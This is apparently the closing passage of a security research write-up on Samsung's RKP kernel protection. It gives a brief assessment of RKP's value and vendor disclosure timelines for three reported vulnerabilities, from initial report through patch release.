Talking about the impact of Samsung RKP on the overall device security, we believe that it is contributing to making the device more secure, despite the flaws of the implementation. As a defense-in-depth measure, it is making it harder for an attacker to compromise the device. When writing an Android kernel exploit, an attacker will need to find an RKP bypass if they intend to get code execution on a Samsung device. Unfortunately, there are known bypasses that need to be addressed by Samsung.

Timeline

SVE-2021-20178

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 08, 2021 - Notification that the update patching the vulnerability has been released.
  • Jul. 20, 2021 - We reopen the issue after binary diffing the fix.
  • Jul. 30, 2021 - The issue will be patched in the October security update.
  • Oct. 05, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20179

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 25, 2021 - No updates at the moment.
  • Feb. 17, 2021 - Vulnerability is confirmed.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - The issue will be patched in the May security update.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - Notification that the update patching the vulnerability has been released.

SVE-2021-20176

  • Jan. 04, 2021 - Initial report sent to Samsung.
  • Jan. 05, 2021 - A security analyst is assigned to the issue.
  • Jan. 19, 2021 - We ask for updates.
  • Jan. 29, 2021 - No updates at the moment.
  • Mar. 03, 2021 - We ask for updates.
  • Mar. 04, 2021 - Vulnerability is confirmed.
  • May 04, 2021 - We ask for updates.
  • May 10, 2021 - The issue will be patched in the June security update.
  • Jun. 06, 2021 - We ask for updates.
  • Jun. 23, 2021 - Notification that the update patching the vulnerability has been released.